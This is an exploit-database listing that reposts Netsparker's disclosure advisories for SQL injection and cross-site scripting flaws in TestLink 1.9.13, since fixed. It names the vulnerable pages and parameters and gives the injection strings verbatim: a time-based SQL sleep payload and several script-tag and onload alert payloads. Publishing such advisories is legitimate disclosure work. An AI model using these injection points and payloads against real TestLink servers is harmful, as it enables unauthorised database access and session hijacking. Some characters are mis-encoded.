Lucene search

K
zdtOmar Kurt1337DAY-ID-24380
HistoryOct 07, 2015 - 12:00 a.m.

TestLink 1.9.13 Cross Site Scripting / SQL Injection Vulnerabilities

2015-10-0700:00:00
Omar Kurt
0day.today
33

0.001 Low

EPSS

Percentile

50.8%

Exploit for php platform in category web applications

Information
--------------------
Advisory by Netsparker.
Name: SQL Injection Vulnerability in TestLink 1.9.13
Affected Software : TestLink
Affected Versions: 1.9.1.3 and possibly below
Vendor Homepage : http://testlink.org/
Vulnerability Type : SQL Injection
Severity : Critical
Status : Fixed
CVE-ID : CVE-2015-7390
Netsparker Advisory Reference : NS-15-015

Description
--------------------
If your web application is vulnerable to SQL injection, a hacker is
able to execute any malicious SQL query or command through the web
application.

Technical Details
--------------------
Proof of Concept URLs for SQL Injection vulnerability in TestLink:

Page: lnl.php
Parameter Name: apikey
Parameter Type: GET
Attack Pattern: '+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

For more information on SQL Injection vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/sql-injection/

Information
--------------------
Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in TestLink 1.9.13
Affected Software : TestLink
Affected Versions: 1.9.1.3 and possibly below
Vendor Homepage : http://testlink.org/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-7391
Netsparker Advisory Reference : NS-15-016

Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in userโ€™s session. This means that the malicious
hacker can change the logged in userโ€™s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administratorโ€™s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Technical Details
--------------------
Proof of Concept URLs for XSS in TestLink 1.9.13:

/testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php
Parameter Name  selected_end_date
Parameter Type  POST
Attack Pattern  '"--></style></scRipt><scRipt>alert(0x008360)</scRipt>

/testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php
Parameter Name  selected_start_date
Parameter Type  POST
Attack Pattern  '"--></style></scRipt><scRipt>alert(0x007F5A)</scRipt>

/testlink-code-1.9.13/lib/testcases/containerEdit.php
Parameter Name  containerType
Parameter Type  POST
Attack Pattern  '"--></style></scRipt><scRipt>alert(0x0053E8)</scRipt>

/testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc
Parameter Name  filter_tc_id
Parameter Type  POST
Attack Pattern  "><body onload=alert(9)>

/testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc
Parameter Name  filter_testcase_name
Parameter Type  POST
Attack Pattern  '"--></style></scRipt><scRipt>alert(0x0050D4)</scRipt>

/testlink-code-1.9.13/lib/testcases/tcImport.php?containerID=2&bIntoProject=1&useRecursion='"--></style></scRipt><scRipt>alert(0x004898)</scRipt>
Parameter Name  useRecursion
Parameter Type  GET
Attack Pattern  '"--></style></scRipt><scRipt>alert(0x004898)</scRipt>

/testlink-code-1.9.13/lib/testcases/tcSearch.php
Parameter Name  targetTestCase
Parameter Type  POST
Attack Pattern  "><body onload=alert(9)>

/testlink-code-1.9.13/lib/testcases/tcSearch.php
Parameter Name  created_by
Parameter Type  POST
Attack Pattern  "><scRipt>alert(9)</scRipt>

/testlink-code-1.9.13/third_party/user_contribution/fakeRemoteExecServer/client4fakeXMLRPCTestRunner.php
Parameter Name  Referer
Parameter Type  HTTP Header
Attack Pattern  '"--></style></scRipt><scRipt>alert(0x00FF1E)</scRipt>

For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/cross-site-scripting-xss/

#  0day.today [2018-02-19]  #

0.001 Low

EPSS

Percentile

50.8%